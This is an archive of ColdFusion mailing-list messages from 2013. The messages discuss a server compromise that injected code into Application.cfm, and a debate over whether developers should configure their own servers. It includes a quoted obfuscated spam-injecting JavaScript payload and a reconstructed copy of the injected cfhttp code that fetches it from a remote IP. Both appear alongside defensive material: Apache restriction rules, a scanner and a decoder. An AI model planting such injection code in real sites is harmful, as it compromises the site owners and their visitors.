RE: Possible Hack?
http://www.adobe.com/support/security/bulletins/apsb13-03.html

This is the recent fix that affected many of our servers, which led to many sites (and VPS) with that compromise. When Hosting.com (our parent company) sent the notification to their customers there was no hot fix. Our (Hostmysite) admins set up server-wide URL rewrite rules on our shared servers to restrict CFIDE until a patch was in place.

It apparently was the no RDS password (even though disabled) that caused our issue. At least we think.

Byron Mann
Lead Engineer & Architect
HostMySite.com

~| Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354250
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
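An added example of the kind of server-wide restriction Byron describes (this is illustrative editor's code, not the rules HostMySite actually deployed, and not from Adobe). It is written for Apache httpd.conf or a VirtualHost section, where the RewriteRule pattern sees the leading slash; the admin address 203.0.113.10 is a placeholder. It keeps /CFIDE/scripts reachable because cfform and cfajax pages load their JavaScript from there, so denying the whole /CFIDE tree breaks those pages. The Apache 2.4 Location variant at the end does the same job without mod_rewrite.

```apache
# Added example, not HostMySite's actual configuration.
# Put this in httpd.conf or inside a <VirtualHost>; mod_rewrite must be loaded.
RewriteEngine On

# Placeholder admin address (replace with your management IP or range).
# All RewriteCond lines are ANDed with the RewriteRule below: deny a request
# if it is under /CFIDE, is NOT under /CFIDE/scripts, and does NOT come
# from the allowlisted address.
RewriteCond %{REQUEST_URI} !^/CFIDE/scripts/ [NC]
RewriteCond %{REMOTE_ADDR} !^203\.0\.113\.10$
RewriteRule ^/CFIDE(/.*)?$ - [F,NC]

# Equivalent on Apache 2.4 using mod_authz_core instead of mod_rewrite.
# The later, more specific <Location> overrides the earlier one, so
# /CFIDE/scripts stays open while the rest of /CFIDE is IP-restricted.
<Location "/CFIDE">
    Require ip 203.0.113.10
</Location>
<Location "/CFIDE/scripts">
    Require all granted
</Location>
```

After reloading Apache, check the rule from a host that is not on the allowlist: a request for /CFIDE/administrator/ should return 403, while a request for a file under /CFIDE/scripts/ still returns 200. The restriction has to live in the web server tier, in front of the ColdFusion connector, so that blocked requests never reach ColdFusion at all.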
Re: Source control in CF
> Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely.
> Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not.

There's a potentially large range of items between those two. I think you would find that most professional drivers are actually pretty good at simple car repairs.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354249
Re: Source control in CF
> I personally disagree, respectfully of course, with the people who say, that developers should be able to maintain CF and web server, as well as set up 3rd party components etc. To me, that is like saying that any developer should be able to set up a database server, know how DNS functions etc.
>
> While I would agree, that knowing some of these things could be beneficial for a developer from time to time, I feel that developers should be specialists who focus solely on developing - not on server maintenance.

I have to disagree with practically everything you've written here. In my experience, many web developers simply do not know enough about their development stack - which includes all of the items you've mentioned. You don't have to be an expert at configuring a database server or managing DNS, but I can't count the enormous number of times my knowledge of both of those has saved countless hours debugging problems. Your applications don't live in a vacuum - they interact with all of these things. If you don't know how they work, how will you identify problems that aren't directly in your CF code?

Here's an extreme example. Many years ago, I was helping some CF developers who were building an application that relied on custom functionality in the browser - a Netscape browser plugin, to be exact. This plugin was written in C++. The developer of the plugin worked offsite, and had the plugin working on her development environment. The CF guys couldn't get it to work on their development environment, though, and had been fighting with it for several months. It turns out that the offsite development environment had debug libraries, and the local one did not - it was as simple as that. Countless hours were shot to hell because nobody on the CF team knew how to check for dependencies, because it was "outside their scope". I fortunately knew how to do this; I did it and discovered the problem the first day I was there.

Many years ago, when I was in the military, I drove a tank. But I also learned how to be a gunner, loader, and tank commander - not because I would have to do those things regularly, but because a good driver has to know how those other jobs work in order to do his own job.

Now, to wrap this up, I did say "practically everything". I don't think you have to be an expert on server maintenance. But you have to know the basics on how all the components in your application stack work. And for that matter, there are very few experts on CF server maintenance who aren't CF developers. If you ask the average server administrator how best to manage CF, you're probably going to get a blank stare in response. Hell, I developed a class for CF administration for this very reason - I ran into so many clients who simply didn't know what they were doing (and this remains the case to this very day).

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354248
RE: Source control in CF
With most of the jobs I have had (here in the US), web developers usually are not only the developers, but also the DBA, sys admin, network admin, project manager, etc...

Eric

-----Original Message-----
From: Michael Christensen [mailto:mich...@strib.dk]
Sent: Saturday, February 02, 2013 6:11 PM
To: cf-talk
Subject: Re: Source control in CF

@Russ

I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer.

In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course.

Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not.

In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server.

If nothing else, I think we can safely say, that Mr. Camden would not employ me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :)

(oh and on a side note, I find it very interesting to learn about the obviously different views expressed in this thread - gives a man something to ponder)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354247
Re: Source control in CF
On Sat, Feb 2, 2013 at 6:26 PM, Michael Christensen wrote:
>
> I admit, there may be every chance that the reason why I don't agree with you is that A) I am not used to an environment in which developers develop locally

I'd say that's a really good reason for you to have previously not agreed with the notion of a developer being able to configure his/her own **development** environment - you had (apparently) never seen or heard of it before. However, I think that's a terrible excuse to completely discount the notion now that it has been presented to you.

> or (perhaps more frighteningly) B) I am just not very bright.

I doubt that. Lazy, perhaps? I might could see how you could say that, but my bet is you're not exactly "stoopid". ;-)

> I am always willing to learn and expand my horizon though, so could you perhaps briefly explain, why you consider it necessary for a developer to be able to set up sites on an Apache or IIS? (I assume it's not just for the sheer practicality of it - so that you don't have to wait around for the IT dept.)

In my opinion, it is unthinkable to call oneself a developer and yet have no clue how to configure your own ***development*** environment. The key here is **DEVELOPMENT** environment. Like Ray, I would never hire - or recommend for hire - someone to fill a developer's role if they were unable to configure their own **development** environment. There are many, many, many reasons for that, and saving the IT department time is probably least among those reasons.

- To be a developer, one has to be able to configure a **development** environment for oneself to work in. If one can't do that, then one can't develop. Development _requires_ basic understanding of how things work. It doesn't matter if you're talking web development, desktop development, rocket development, landscape development, or any other kind of development. Basic understanding of the environment one is developing for is absolutely required.

- If someone calls themselves a "developer", then I fully EXPECT them to not just copy/paste/churn "code" for whatever project I've placed them on, but to also tinker and play and be in a constant state of learning, even on their own time. If they aren't doing that, then they are simply here to be babysat and collect a check. I don't believe in babysitting or paying for people to be babysat. :-)

- One cannot truly progress as a developer if one cannot build their own **development** environment. If they're dependent upon someone else to configure their **development** environment, then they're stuck with whatever they're given and will never venture outside that to see what else is out there. And I assure you, "seeing what else is out there" is paramount to growing and becoming better at what you do.

I tried to boil it down in just a few points, but there are many reasons why one MUST be able to configure their own **development** environment. This thread is filled with them.

By the way, hopefully readers of this post have noticed a recurring theme: **development** environment. In no way, shape, or form, do I expect a developer to be able to set up and monitor/maintain a _production_ environment. That is an entirely different animal, and is best left to those who specialize in (and enjoy!) the server management of things. Having said that, I believe that it is a natural progression for a developer to learn how to set up and maintain a server. I just don't expect them to do that as part of their development duties.

HTH

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354246
Re: Source control in CF
If I may, I think there are some core concept differences between Michael's scenario and the others. What I am seeing in your questions and responses points to a corporate structure where "development" is not a part of "IT". Correct me if I'm wrong there.

In many cases the structure is different, with the two being the same with different roles but supporting each other. IT (or server admins) taking care of the hardware, patches, and environment but leaving the development environment to the developers themselves. It's a subtle difference but one that helps lessen the load and increase the skillset of the dev team.

Also consider solo developers who have to do it all.

I have been in all three situations and will never go back to the first. When I was first getting started I didn't know anything about servers. I learned as much as I could from whatever sources I could, especially this list, and now I can not only plan and build applications but also set up both internal and external servers and deal with the management issues that come up.

So the "right" answer comes down to not only how you need to handle this situation but also how your company structure is and how much you want to increase the skills of your development team.

Hatton

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354245
Re: Source control in CF
Setting up and managing servers is quite different to having a clue about how your app works and some basic web server knowledge. A developer certainly does not need to know the former, but he should at least have a clue about his own development environment and be able to set it up as close to the live environment as possible.

A developer is not really like a chauffeur; a web designer would probably fit that analogy better. A developer is more like the mechanic. Without some basic understanding of how things work under the hood, both the mechanic and the developer will be relying on a lot of guesswork and luck.

You cannot rely on systems admins as they are not developers, so you will just end up in an "it's your code", "no it's your server" argument, with neither having enough knowledge to prove otherwise. There are only so many times you can tell your client "change hosts, they suck", before they are going to notice a pattern.

On Sun, Feb 3, 2013 at 12:11 AM, Michael Christensen wrote:
>
> @Russ
>
> I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer.
>
> In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course.
>
> Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not.
>
> In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server.
>
> If nothing else, I think we can safely say, that Mr. Camden would not employ me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :)
>
> (oh and on a side note, I find it very interesting to learn about the obviously different views expressed in this thread - gives a man something to ponder)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354244
Re: Source control in CF
I admit, there may be every chance that the reason why I don't agree with you is that A) I am not used to an environment in which developers develop locally or (perhaps more frighteningly) B) I am just not very bright.

I am always willing to learn and expand my horizon though, so could you perhaps briefly explain, why you consider it necessary for a developer to be able to set up sites on an Apache or IIS? (I assume it's not just for the sheer practicality of it - so that you don't have to wait around for the IT dept.)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354243
Re: Source control in CF
No, what Ray is saying is that a developer should be able to turn the car on and drive it, but to maintain the car you need professional help with it.

Michael, I think you need to stop for a minute. A developer should know their way around the Administrator; they should also know how to add sites to Apache and IIS and be able to install software, but to lock it down and fully secure it, then yes, leave that to those who know, and developer machines don't need that. And if they are exposed to the internet then you have much bigger issues than the comparisons you listed below.

--
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

On Sun, Feb 3, 2013 at 11:11 AM, Michael Christensen wrote:
>
> @Russ
>
> I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer.
>
> In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course.
>
> Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not.
>
> In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server.
>
> If nothing else, I think we can safely say, that Mr. Camden would not employ me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :)
>
> (oh and on a side note, I find it very interesting to learn about the obviously different views expressed in this thread - gives a man something to ponder)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354242
Re: Source control in CF
@Russ

I can certainly tell, that we have very different views as to which constitutes a quote-unquote developer.

In keeping with the automotive analogies, I feel that what Raymond is essentially saying, is that he would not hire you to drive a car, unless you were a mechanic. I feel differently about this, as I would rather hire a chauffeur to drive me around than a mechanic - but this is my personal preference of course.

Would I expect my chauffeur to be able to diagnose a flat tire and change it? Absolutely. Would I expect him to be able to diagnose and fix a problem in the engine management system? Absolutely not.

In the same way I personally feel, that although a developer should know (or be able to deduce) about potential security issues like the ones you describe, I would not expect him to know about all the internals of the server.

If nothing else, I think we can safely say, that Mr. Camden would not employ me, as I would much rather leave setting up servers and the likes, to those who specialize in precisely that :)

(oh and on a side note, I find it very interesting to learn about the obviously different views expressed in this thread - gives a man something to ponder)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354241
Re: Source control in CF
One of the primary reasons a developer should have a clue what happens on the server is so they can actually debug and diagnose problems instead of saying to their client/boss "it must be the host's fault, let's get a new host", which is hardly ever the cause of the problem. I have seen plenty of devs make such suggestions to others as well with no basis.

A complete lack of understanding of server security can also cause untold issues, with apps being insecure, or again assuming problems with the host. The number of times I have seen people say they need a host who allows cfexecute, or allows cffile to read/write anywhere on the server, completely oblivious of what a huge security issue this is. Just last week we had a customer who wanted remote desktop access to a shared server and the ability to upload DLLs, and this was coming from their developer.

I can honestly say that most devs we deal with have absolutely no idea what goes on beyond FTPing their files to the server; everything beyond this is a black box to them. It's rather like being a mechanic but saying "I just fix 'em, but I have no idea how the engine works."

Regards
Russ Michaels
www.michaels.me.uk
www.cfmldeveloper.com - Free CFML hosting for developers
www.cfsearch.com - CF search engine

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354240
Re: Source control in CF
On Sat, Feb 2, 2013 at 3:33 PM, Michael Christensen wrote:
> I personally disagree, respectfully of course, with the people who say, that developers should be able to maintain CF and web server, as well as set up 3rd party components etc. To me, that is like saying that any developer should be able to set up a database server, know how DNS functions etc.

Personally, I would consider any developer who 1) could not set up a database server and 2) does not have a solid understanding of DNS to be fairly unemployable. Different organizations have different standards, but I can't even imagine where I would start to find a "developer" who doesn't know how to set up a database server.

-Cameron ...

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354239
Re: Source control in CF
Hard evidence? I will give you the worst case scenario.

Joe has opened a file and begun working on it; in your current setup that means the file will be locked from other developers. Now he has gone to lunch and within 5 minutes another developer needs to make changes to that file. While that developer waits for Joe to return he can't test his changes, as he is waiting for that one file to be unlocked to finish his current task.

Also, when developers are modifying off the same code base on the same server, developers tend to introduce problems to other developers and they end up trying to fix phantom bugs or spend time finding a problem that just magically goes away when the other developer realizes that he screwed up.

I could go on and on, but that last one is the worst one of them all. There is nothing worse than trying to fix something that another developer introduced and then fixed, and sent you trying to see what you did wrong, only to find out that the other developer later fixed it. Yes this does still happen in a revision control system, but the rule of thumb is that any code should not be committed until the developer has fixed the code and run his/her unit tests, and once they have merged and tested again then they should commit the completed task back to the source repository.

Seriously, I think you should have a good think about this for a minute or maybe five. I had the same argument with a job I worked in some time ago, where I was chasing phantom bugs and wasting my time fixing things in a similar situation, and the testers also testing on this means they report bugs that really aren't there; it makes for so much loss of productivity it is not funny.

--
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354238
Re: Source control in CF
> Michael, I've noticed you, and others, have mentioned server maintenance. To be clear, I think there is a -far- difference between someone who is an expert in Apache and IIS tuning and someone double clicking to install Apache. I don't think developers should be fine tuning Apache, or DB servers. But they *should* be able to run a visual installer and accept the defaults. I run MySQL and SQL Server just fine. I don't consider myself even close to being a DBA, but I can make a database and tables and that should be good enough I'd say.

Raymond, I absolutely agree, that we must discern between developers being able to do simple point-and-click installs and configurations - and them being able to do deep-level server analysis and tuning. And you are absolutely right, developers should know about databases and tables, and be able to create tables using the correct datatypes, relations, constraints etc.

But I also understand, why the IT department might impose restrictions as to who is able to do what (we cannot, for example, create new databases ourselves - only the IT department can do that). They are the ones who are ultimately held responsible for the performance, stability and security of the servers (not the code that we write) - and I understand that them imposing restrictions can aid in that.

But like I wrote in response to Andrew's comments - if I was to set up development anew tomorrow, I would probably also favor a setup where each developer can develop locally, without it interfering with other developers.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354237
Re: Source control in CF
@Andrew

> Most developers should know how to install ColdFusion, it is dead simple to begin with, maintaining it well that is another story.

If your premise is that we are talking about developers who are running a setup where each person has a local CF server on his/her machine, then I would agree that it might very well be beneficial for developers to be able to diagnose and fix issues with their own server, without having to wait for the IT department.

> Lost productivity is worse when all developers share and code off the same server, whether you want to believe that or not. But like you said it was 5-6 years ago, so a revisit might be a good thing.

If you are talking from personal experience, having run both types of setups in parallel (either at the same time or at least under as similar conditions as possible, in terms of time, tasks, complexity etc) - then this is indeed valuable insight. However, if I went to my CEO with such a broad and general claim, he would immediately demand that I back it up with hard evidence - which I would have a terrible time doing. Without concrete evidence, I don't know how I would lobby in favor of the company spending the time and money, in changing our current setup.

With that being said, if I was to set up development from scratch tomorrow and I could choose either of the two setups (the current setup was already firmly in place when I joined the company in 2005) - I would probably also favor the setup where each developer runs his/her own server and can develop locally.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354236
Re: Source control in CF
Michael, I've noticed you, and others, have mentioned server maintenance. To be clear, I think there is a -far- difference between someone who is an expert in Apache and IIS tuning and someone double clicking to install Apache. I don't think developers should be fine tuning Apache, or DB servers. But they *should* be able to run a visual installer and accept the defaults. I run MySQL and SQL Server just fine. I don't consider myself even close to being a DBA, but I can make a database and tables and that should be good enough I'd say.

On Sat, Feb 2, 2013 at 2:33 PM, Michael Christensen wrote:
>
> Good tips about developers being able to run software under other licensing rules - I did not think that one through fully I can see now.
>
> I personally disagree, respectfully of course, with the people who say, that developers should be able to maintain CF and web server, as well as set up 3rd party components etc. To me, that is like saying that any developer should be able to set up a database server, know how DNS functions etc.
>
> While I would agree, that knowing some of these things could be beneficial for a developer from time to time, I feel that developers should be specialists who focus solely on developing - not on server maintenance.
>
> I don't know if this might be a cultural difference (in terms of how things are done) - me being Danish personally - but in all places I've worked the last 10 years, the IT department has done most of the configuration and maintenance of developer machines. Not that there is necessarily anything wrong with developers setting things up themselves, but I understand (from the company's perspective) how it can be beneficial to have these things centralized.
>
> Following the previous inputs in this thread, I went digging in my old emails and it turns out (I had completely forgotten about this) that we did indeed talk about switching over from shared resources, to each developer running their own complete setup. The plans were eventually dropped, as it was deemed too expensive (in terms of lost productivity) and adding an additional layer of complexity in terms of maintenance.
>
> This was back in 2007 and perhaps it is time to revisit this once more. You guys' passionate arguments for this approach have certainly given me some food for thought and I will take this up with my colleagues in the near future.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354235
Re: Source control in CF
Michael,

Most developers should know how to install ColdFusion; it is dead simple to begin with. Maintaining it well, that is another story.

But what interests me is this statement:

*The plans were eventually dropped, as it was deemed too expensive (in terms of lost productivity) and adding an additional layer of complexity in terms of maintenance.*

Lost productivity is worse when all developers share and code off the same server, whether you want to believe that or not. But like you said, it was 5-6 years ago, so a revisit might be a good thing.

--
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

On Sun, Feb 3, 2013 at 7:33 AM, Michael Christensen wrote:
> [snip]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354234
Re: Source control in CF
Good tips about developers being able to run software under other licensing rules - I did not think that one through fully I can see now.

I personally disagree, respectfully of course, with the people who say that developers should be able to maintain CF and web server, as well as set up 3rd party components etc. To me, that is like saying that any developer should be able to set up a database server, know how DNS functions etc.

While I would agree that knowing some of these things could be beneficial for a developer from time to time, I feel that developers should be specialists who focus solely on developing - not on server maintenance.

I don't know if this might be a cultural difference (in terms of how things are done) - me being Danish personally - but in all places I've worked the last 10 years, the IT department has done most of the configuration and maintenance of developer machines. Not that there is necessarily anything wrong with developers setting things up themselves, but I understand (from the company's perspective) how it can be beneficial to have these things centralized.

Following the previous inputs in this thread, I went digging in my old emails and it turns out (I had completely forgotten about this) that we did indeed talk about switching over from shared resources, to each developer running their own complete setup. The plans were eventually dropped, as it was deemed too expensive (in terms of lost productivity) and adding an additional layer of complexity in terms of maintenance.

This was back in 2007 and perhaps it is time to revisit this once more. You guys' passionate arguments for this approach have certainly given me some food for thought and I will take this up with my colleagues in the near future.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354233
Re: Possible Hack?
> Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I
> had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see
> nothing in there for those files so the attack would have most likely come in via CF somewhere.

Does the CF server have permission to write to .cfm files?

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354232
RE: Possible Hack?
Yeah our host Hosting.com sent out an email about those vulnerabilities and we applied the hotfixes for those already. About 6 weeks ago I think.

The only thing I can think of is the cfide is set up as a virtual directory for these sites so they can use things like the FCKEditor etc. Is there another way to enable the use of things like that without just setting the CFIDE directory as a virtual directory for the entire site?

-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Saturday, February 02, 2013 11:58 AM
To: cf-talk
Subject: Re: Possible Hack?

[snip]

On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts wrote:
> [snip]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354231
Re: Possible Hack?
You should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot.

Check your FTP logs for any hacked ftp accounts.

A general security scan against your server would be a good idea. As well as http://hackmycf.com/

On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts wrote:
> [snip]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354230
RE: Possible Hack?
Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files so the attack would have most likely come in via CF somewhere.

-Original Message-
From: Dave Watts [mailto:dwa...@figleaf.com]
Sent: Saturday, February 02, 2013 11:49 AM
To: cf-talk
Subject: Re: Possible Hack?

> [snip]

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354229
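The reply above asks how the attacker got in and notes that the FTP logs are clean. A first triage step a practitioner would want at this point is to find every other file on the VPS carrying the same injection, see when each was last written, and check whether the account ColdFusion runs under can write it (the question Dave asks in this thread). The script below is an added example, not code from the thread. Its indicators are taken from the posted snippet (the "Archivver" user agent, the cfhttp call that fetches #SERVER_NAME##SCRIPT_NAME#, and the 199.19.94.194/cfset2.txt payload URL); the web root it scans is a sample tree constructed inside the script so it runs offline, and the injected sample in it is assembled from the fragments visible in the original post, so it is an approximation of the real file, which contained more tags than the archive preserved.

```python
"""Triage scan for the Application.cfm injection discussed in this thread.

Added example, not code from the thread. The indicators come from the posted
snippet; the web root scanned in __main__ is a sample tree constructed here so
the script runs offline. Run scan_webroot() against a real web root under the
ColdFusion service account to learn what that account can write."""

import os
import re
import tempfile
import time
from dataclasses import dataclass, field

# (label, pattern). Case-insensitive: CFML tag and attribute names are not case-sensitive.
INDICATORS = [
    ("archivver-user-agent", re.compile(r'userAgent\s*=\s*"Archivver"', re.I)),
    ("self-fetch-cfhttp", re.compile(r'<cfhttp[^>]*#SERVER_NAME##SCRIPT_NAME#', re.I)),
    ("payload-host", re.compile(r'199\.19\.94\.194')),
    ("payload-file", re.compile(r'cfset2\.txt', re.I)),
]

@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)
    mtime: float = 0.0
    writable: bool = False  # can the account running this scan modify the file?

def scan_file(path):
    """Return a Finding if the file matches any indicator, else None."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = [label for label, rx in INDICATORS if rx.search(text)]
    if not hits:
        return None
    st = os.stat(path)
    return Finding(path, hits, st.st_mtime, os.access(path, os.W_OK))

def scan_webroot(root):
    """Walk every .cfm/.cfc under root (all sites on the box) and collect matches, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".cfm", ".cfc")):
                found = scan_file(os.path.join(dirpath, name))
                if found:
                    findings.append(found)
    return sorted(findings, key=lambda f: f.path)

CLEAN = '<cfapplication name="shop" sessionmanagement="true">\n'

# Constructed sample of the injection, assembled from the fragments visible in the
# original post (self-fetching cfhttp with userAgent "Archivver", then the remote
# payload). The real file had more tags than the archive preserved; this is an
# approximation used only to exercise the scanner.
INJECTED = (
    '<cfhttp url="http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">\n'
    '<cfset paga = cfhttp.fileContent>\n'
    '<cfhttp url="http://199.19.94.194/cfset2.txt">\n'
    '<cfoutput>#paga##cfhttp.fileContent#</cfoutput>\n'
)

def build_sample_webroot():
    """Create a throwaway web root: one clean site, one injected site, and an injected index page."""
    root = tempfile.mkdtemp(prefix="cfroot-")
    layout = {
        "site_a/Application.cfm": CLEAN,
        "site_b/Application.cfm": INJECTED + CLEAN,
        "site_b/index.cfm": INJECTED,
        "site_c/Application.cfc": CLEAN,
    }
    for rel, body in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for f in scan_webroot(build_sample_webroot()):
        when = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(f.mtime))
        print(f"{f.path}\n  indicators: {', '.join(f.indicators)}"
              f"\n  last modified: {when}\n  writable by this account: {f.writable}")
```

The writability column only means something when the scan runs as the ColdFusion service account; run as SYSTEM or an administrator, every file shows as writable. Match the reported modification times against the web server access log for the same minute to find the request that wrote the file, and treat a clean-looking timestamp as weak evidence, since an attacker who can write the file can also reset its mtime.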
Re: Possible Hack?
> I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the
> top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm
> pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated.

The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also.

The "somewhere else" is this URL:

http://199.19.94.194/cfset2.txt

The content of that URL is:

    function zdrViewState()
    {
    var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
    t=z='';
    for(v=0;vif(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}'+x[0]+'>');}zdrViewState();

followed by a snippet of spam for payday loans.

There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything.

Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install.

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228
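To see what the obfuscated JavaScript quoted above actually hides, here is a Python re-implementation of its decoding loop, added as an example and not part of the original message. The rule visible in the posted code is: walk each array element two digits at a time, add 25-l+a to each pair (l is the array length, a the 1-based loop counter, so element x[l-a] is shifted by 25-(l-a)), and take that character code. The copy that reached the list lost part of the for loop and references an x[4] that is not in the four-element array, so the script decodes the four strings that survived and assembles the document.write() output on the assumption that it produces a single <style> block with one class rule.

```python
"""Decoder for the numeric-pair obfuscation in the cfset2.txt payload quoted above.

Added example, not part of the thread. It mirrors the decoding rule visible in
the posted JavaScript so the hidden strings can be read without executing the
attacker's code. The array below is copied verbatim from the posted payload."""

POSTED_ARRAY = [
    "9091968376",
    "88879181928187863473749187849392773592878834218896",
    "9977918890",
    "949990793917947998942577939317",
]

def decode_element(digits, shift):
    """Mirror the inner loop: consume two digits at a time, add the shift, emit one character.
    A trailing odd digit is dropped, as in the original."""
    out, buf = [], ""
    for ch in digits:
        buf += ch
        if len(buf) == 2:
            out.append(chr(int(buf) + shift))
            buf = ""
    return "".join(out)

def decode_array(x):
    """Mirror the outer loop: while(++a<=l){ m=x[l-a]; ... parseInt(t)+25-l+a ... }
    Returns a new list with every element decoded; the input is left untouched."""
    l = len(x)
    decoded = list(x)
    for a in range(1, l + 1):
        decoded[l - a] = decode_element(x[l - a], 25 - l + a)
    return decoded

def reassemble(decoded):
    """Best reading of the document.write() call: <tag attr>.cls{rule}</tag>.
    Assumption: the posted write references x[4], which is not in the posted array,
    so the four decoded strings are used as tag, rule, class name and tag attribute."""
    tag, rule, cls, attr = decoded
    return f"<{tag} {attr}>.{cls}{{{rule}}}</{tag}>"

if __name__ == "__main__":
    decoded = decode_array(POSTED_ARRAY)
    for i, s in enumerate(decoded):
        print(f"x[{i}] -> {s!r}")
    print(reassemble(decoded))
```

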